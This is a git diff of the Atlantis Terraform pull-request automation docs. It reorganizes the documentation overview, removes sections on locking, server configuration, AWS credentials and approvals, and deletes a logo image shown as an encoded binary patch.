-* Deploy Atlantis internally. You don't have to give your cloud credentials to a third party.
+* You deploy Atlantis internally. You don't have to give your cloud credentials to a third party.
     * It runs as a golang binary or Docker container.
+* Expose it with a URL that is accessible by github/gitlab.com or your private git host.
 * Add its URL to your GitHub or GitLab repository so it can receive webhooks.
-* When a Terraform pull request is opened, Atlantis runs `terraform plan` and comments
+* When a Terraform pull request is opened, Atlantis will run `terraform plan` and comment
 with the output back to the pull request.
     * The exact `terraform plan` command is configurable.
-    * This directory and Terraform workspace within the repository are now "Locked".
-    Other pull requests cannot `plan` against the same directory/workspace until the plan
-    is applied or deleted and the pull request is merged.
 * If the `plan` looks good, users can comment on the pull request `atlantis apply` to apply the plan.
     * You can require pull request approval before running `apply` is allowed.
diff --git a/runatlantis.io/docs/README.md b/runatlantis.io/docs/README.md
index 28d32b9987..b55f19a237 100644
--- a/runatlantis.io/docs/README.md
+++ b/runatlantis.io/docs/README.md
@@ -1,20 +1,16 @@
 # Overview
 
+This documentation is divided into sections:
+* [Pull Request Commands](pull-request-commands.html) - the commands that Atlantis supports via pull request comments.
+* [Production-Ready Deployment](deployment.html) - how to deploy Atlantis.
+* [Server Configuration](server-configuration.html) - how to configure the Atlantis server.
+* [Locking](locking.html) - how and why Atlantis does locking.
+* [`atlantis.yaml` Reference](atlantis-yaml-reference) - reference docs for the `atlantis.yaml` configuration file.
+* [Security](security.html) - what you need to think about in terms of security for Atlantis.
+* [FAQ](faq.html) - Frequently asked questions.
 
 
 
-## Locking
-When `plan` is run, the [project](#project) and [workspace](#workspaceenvironment) (**but not the whole repo**) are **Locked** until an `apply` succeeds **and** the pull request/merge request is merged.
-This protects against concurrent modifications to the same set of infrastructure and prevents
-users from seeing a `plan` that will be invalid if another pull request is merged.
-
-If you have multiple directories inside a single repository, only the directory will be locked. Not the whole repo.
-
-To unlock the project and workspace without completing an `apply` and merging, click the link
-at the bottom of the plan comment to discard the plan and delete the lock.
-Once a plan is discarded, you'll need to run `plan` again prior to running `apply` when you go back to that pull request.
-
-
 
 
 
diff --git a/runatlantis.io/docs/deployment.md b/runatlantis.io/docs/deployment.md
index 29ef623613..e95e31ce73 100644
--- a/runatlantis.io/docs/deployment.md
+++ b/runatlantis.io/docs/deployment.md
@@ -374,93 +374,3 @@ If you'd like to test out Atlantis before running it on your own repositories yo
 	- `atlantis apply` will run `terraform apply`. Since our pull request creates a `null_resource` (which does nothing) this is safe to do.
 
 
-## Server Configuration
-Configuration for `atlantis server` can be specified via command line flags, environment variables or a YAML config file.
-Config file values are overridden by environment variables which in turn are overridden by flags.
-
-### YAML
-To use a yaml config file, run atlantis with `--config /path/to/config.yaml`.
-The keys of your config file should be the same as the flag, ex.
-```yaml
----
-gh-token: ...
-log-level: ...
-```
-
-### Environment Variables
-All flags can be specified as environment variables. You need to convert the flag's `-`'s to `_`'s, uppercase all the letters and prefix with `ATLANTIS_`.
-For example, `--gh-user` can be set via the environment variable `ATLANTIS_GH_USER`.
-
-To see a list of all flags and their descriptions run `atlantis server --help`
-
-## AWS Credentials
-Atlantis simply shells out to `terraform` so you don't need to do anything special with AWS credentials.
-As long as `terraform` works where you're hosting Atlantis, then Atlantis will work.
-See https://www.terraform.io/docs/providers/aws/#authentication for more detail.
-
-### Multiple AWS Accounts
-Atlantis supports multiple AWS accounts through the use of Terraform's
-[AWS Authentication](https://www.terraform.io/docs/providers/aws/#authentication).
-
-If you're using the [Shared Credentials file](https://www.terraform.io/docs/providers/aws/#shared-credentials-file)
-you'll need to ensure the server that Atlantis is executing on has the corresponding credentials file.
-
-If you're using [Assume role](https://www.terraform.io/docs/providers/aws/#assume-role)
-you'll need to ensure that the credentials file has a `default` profile that is able
-to assume all required roles.
-
-[Environment variables](https://www.terraform.io/docs/providers/aws/#environment-variables) authentication
-won't work for multiple accounts since Atlantis wouldn't know which environment variables to execute
-Terraform with.
-
-### Assume Role Session Names
-Atlantis injects the Terraform variable `atlantis_user` and sets it to the GitHub username of
-the user that is running the Atlantis command. This can be used to dynamically name the assume role
-session. This is used at Hootsuite so AWS API actions can be correlated with a specific user.
-
-To take advantage of this feature, use Terraform's [built-in support](https://www.terraform.io/docs/providers/aws/#assume-role) for assume role
-and use the `atlantis_user` terraform variable
-
-```hcl
-provider "aws" {
-  assume_role {
-    role_arn     = "arn:aws:iam::ACCOUNT_ID:role/ROLE_NAME"
-    session_name = "${var.atlantis_user}"
-  }
-}
-
-# need to define the atlantis_user variable to avoid terraform errors
-variable "atlantis_user" {
-  default = "atlantis_user"
-}
-```
-
-If you're also using the [S3 Backend](https://www.terraform.io/docs/backends/types/s3.html)
-make sure to add the `role_arn` option:
-
-```hcl
-terraform {
-  backend "s3" {
-    bucket   = "mybucket"
-    key      = "path/to/my/key"
-    region   = "us-east-1"
-    role_arn = "arn:aws:iam::ACCOUNT_ID:role/ROLE_NAME"
-    # can't use var.atlantis_user as the session name because
-    # interpolations are not allowed in backend configuration
-    # session_name = "${var.atlantis_user}" WON'T WORK
-  }
-}
-```
-
-Terraform doesn't support interpolations in backend config so you will not be
-able to use `session_name = "${var.atlantis_user}"`. However, the backend assumed
-role is only used for state-related API actions. Any other API actions will be performed using
-the assumed role specified in the `aws` provider and will have the session named as the GitHub user.
-
-## Approvals
-If you'd like to require pull/merge requests to be approved prior to a user running `atlantis apply` simply run Atlantis with the `--require-approval` flag.
-By default, no approval is required.
-
-For more information on GitHub pull request reviews and approvals see: [https://help.github.com/articles/about-pull-request-reviews/](https://help.github.com/articles/about-pull-request-reviews/)
-
-For more information on GitLab merge request reviews and approvals (only supported on GitLab Enterprise) see: [https://docs.gitlab.com/ee/user/project/merge_requests/merge_request_approvals.html](https://docs.gitlab.com/ee/user/project/merge_requests/merge_request_approvals.html).
diff --git a/runatlantis.io/docs/images/atlantis-logo.png b/runatlantis.io/docs/images/atlantis-logo.png
deleted file mode 100644
index 748e26771af638c3dea9a2c31626213b7e43bf38..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 14750
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
